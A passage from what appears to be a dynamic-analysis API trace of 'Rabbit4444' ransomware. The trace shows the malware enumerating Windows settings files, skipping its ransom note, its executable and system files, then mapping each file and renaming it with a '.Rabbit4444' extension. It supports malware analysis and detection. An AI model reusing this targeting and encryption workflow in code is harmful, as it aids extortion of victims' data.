(lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.658] lstrcmpiW (lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.658] lstrcmpiW (lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", lpString2="boot") returned 1 [0059.658] lstrcmpiW (lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.658] lstrcmpiW (lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.658] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms" | out: lpString1="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms") returned="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms" [0059.658] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.658] lstrlenW (lpString="Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms") returned 64 [0059.658] lstrlenW (lpString="Rabbit4444") returned 10 [0059.658] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.658] lstrlenW (lpString=".dll") returned 4 [0059.658] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.658] lstrlenW (lpString=".lnk") returned 4 [0059.659] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.659] lstrlenW (lpString=".ini") returned 4 [0059.659] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.659] lstrlenW (lpString=".sys") returned 4 [0059.659] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.659] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ee439e7e-ce1e-4abe-9ea8-50f12ed01fe0}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.659] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.659] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15096976484) returned 1 [0059.659] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=986) returned 1 [0059.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0059.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0059.659] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0059.662] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0059.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0059.663] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0059.664] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15097448799) returned 1 [0059.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0059.664] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0059.664] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.664] CloseHandle (hObject=0x298) returned 1 [0059.664] CloseHandle (hObject=0x278) returned 1 [0059.664] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms.Rabbit4444") returned 192 [0059.664] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ee439e7e-ce1e-4abe-9ea8-50f12ed01fe0}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EE439E7E-CE1E-4ABE-9EA8-50F12ED01FE0}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ee439e7e-ce1e-4abe-9ea8-50f12ed01fe0}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.665] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x572edf3c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x572edf3c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", cAlternateFileName="CL0A77~1.SET")) returned 1 [0059.665] lstrcmpiW (lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.665] lstrcmpiW (lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.665] lstrcmpiW (lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.665] lstrcmpiW (lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", lpString2=".") returned 1 [0059.665] lstrcmpiW (lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", lpString2="..") returned 1 [0059.665] lstrcmpiW (lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", lpString2="windows") returned -1 [0059.665] lstrcmpiW (lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.665] lstrcmpiW (lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.665] lstrcmpiW (lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", lpString2="boot") returned 1 [0059.665] lstrcmpiW (lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.665] lstrcmpiW (lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.665] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms" | out: lpString1="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms") returned="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms" [0059.665] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.665] lstrlenW (lpString="Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms") returned 64 [0059.665] lstrlenW (lpString="Rabbit4444") returned 10 [0059.666] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.666] lstrlenW (lpString=".dll") returned 4 [0059.666] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.666] lstrlenW (lpString=".lnk") returned 4 [0059.666] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.666] lstrlenW (lpString=".ini") returned 4 [0059.666] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.666] lstrlenW (lpString=".sys") returned 4 [0059.666] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.666] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ef462183-352b-4dcf-811c-07fa7cfcd5ac}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.666] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.666] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15097686936) returned 1 [0059.666] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=985) returned 1 [0059.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0059.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0059.666] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0059.667] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0059.668] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.668] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.668] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.668] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.668] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.669] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15097940978) returned 1 [0059.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0059.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0059.669] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.669] CloseHandle (hObject=0x298) returned 1 [0059.669] CloseHandle (hObject=0x278) returned 1 [0059.669] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms.Rabbit4444") returned 192 [0059.669] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ef462183-352b-4dcf-811c-07fa7cfcd5ac}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EF462183-352B-4DCF-811C-07FA7CFCD5AC}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ef462183-352b-4dcf-811c-07fa7cfcd5ac}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.670] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57386907, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57386907, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", cAlternateFileName="CLD48B~1.SET")) returned 1 [0059.670] lstrcmpiW (lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.670] lstrcmpiW (lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.670] lstrcmpiW (lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.670] lstrcmpiW (lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", lpString2=".") returned 1 [0059.670] lstrcmpiW (lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", lpString2="..") returned 1 [0059.670] lstrcmpiW (lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", lpString2="windows") returned -1 [0059.670] lstrcmpiW (lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.670] lstrcmpiW (lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.670] lstrcmpiW (lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", lpString2="boot") returned 1 [0059.670] lstrcmpiW (lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.670] lstrcmpiW (lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.670] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms" | out: lpString1="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms") returned="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms" [0059.670] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.670] lstrlenW (lpString="Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms") returned 64 [0059.670] lstrlenW (lpString="Rabbit4444") returned 10 [0059.670] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.671] lstrlenW (lpString=".dll") returned 4 [0059.671] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.671] lstrlenW (lpString=".lnk") returned 4 [0059.671] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.671] lstrlenW (lpString=".ini") returned 4 [0059.671] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.671] lstrlenW (lpString=".sys") returned 4 [0059.671] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.671] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ef8f379b-747b-4c8e-b3d1-4a29e6cf45ae}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.671] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.671] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15098185124) returned 1 [0059.671] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=968) returned 1 [0059.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0059.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0059.671] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0059.672] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0059.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.673] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.674] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15098448023) returned 1 [0059.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0059.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0059.674] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.674] CloseHandle (hObject=0x298) returned 1 [0059.674] CloseHandle (hObject=0x278) returned 1 [0059.674] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms.Rabbit4444") returned 192 [0059.674] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ef8f379b-747b-4c8e-b3d1-4a29e6cf45ae}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EF8F379B-747B-4C8E-B3D1-4A29E6CF45AE}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ef8f379b-747b-4c8e-b3d1-4a29e6cf45ae}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.675] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5741f21c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5741f21c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x495, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", cAlternateFileName="CL8A3E~1.SET")) returned 1 [0059.675] lstrcmpiW (lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.675] lstrcmpiW (lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.675] lstrcmpiW (lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.675] lstrcmpiW (lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", lpString2=".") returned 1 [0059.675] lstrcmpiW (lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", lpString2="..") returned 1 [0059.675] lstrcmpiW (lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", lpString2="windows") returned -1 [0059.675] lstrcmpiW (lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.675] lstrcmpiW (lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.675] lstrcmpiW (lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", lpString2="boot") returned 1 [0059.675] lstrcmpiW (lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.675] lstrcmpiW (lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.675] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms" | out: lpString1="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms") returned="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms" [0059.675] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.676] lstrlenW (lpString="Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms") returned 64 [0059.676] lstrlenW (lpString="Rabbit4444") returned 10 [0059.676] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.676] lstrlenW (lpString=".dll") returned 4 [0059.676] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.676] lstrlenW (lpString=".lnk") returned 4 [0059.676] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.676] lstrlenW (lpString=".ini") returned 4 [0059.676] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.676] lstrlenW (lpString=".sys") returned 4 [0059.676] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.676] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{efacecba-bccd-468b-bab3-7ca40a898982}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.676] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.676] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15098701419) returned 1 [0059.676] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1173) returned 1 [0059.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0059.676] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.676] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, 